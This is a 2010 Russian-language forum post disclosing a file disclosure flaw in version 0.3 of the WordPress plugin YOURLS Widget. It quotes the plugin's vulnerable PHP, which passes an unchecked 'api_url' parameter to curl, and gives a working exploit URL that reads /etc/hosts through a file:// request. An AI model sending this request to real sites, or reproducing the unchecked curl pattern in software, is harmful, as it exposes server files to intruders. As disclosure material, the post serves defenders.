Prev Предыдущее сообщение   Следующее сообщение Next
Старый 08.09.2010, 16:07   #32
RulleR
 
Аватар для RulleR
 
Регистрация: 04.07.2010
Сообщений: 39
Репутация: 58
По умолчанию WordPress Plugin [YOURLS Widget] File Disclosure Vulnerability

Plugin name: YOURLS Widget (download)
Version: 0.3

File Disclosure

Vuln file: /wp-content/plugins/yourls-widget/yourls-widget-hook.php
PHP код:
/*...*/
$api_url $_REQUEST['api_url'];

// Init the CURL session
$ch curl_init();
curl_setopt($chCURLOPT_URL$api_url);
curl_setopt($chCURLOPT_HEADER0);            // No header in the result
curl_setopt($chCURLOPT_RETURNTRANSFERtrue); // Return, do not echo result
curl_setopt($chCURLOPT_POST1);              // This is a POST request
/*...*/
$data curl_exec($ch);
curl_close($ch);

// Do something with the result. Here, we just echo it.
echo <<<SHOWTIME
    <a href='$data'>$data</a>
SHOWTIME;
/*...*/ 
Exploit:
Код:
http://[host]/[path]/wp-content/plugins/yourls-widget/yourls-widget-hook.php?api_url=file:///etc/hosts
RulleR вне форума   Ответить с цитированием
 

Метки
auth bypass, уязвимости wordpress, wordpress, wordpress plugin vuln, wordpress vulnerabilities

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot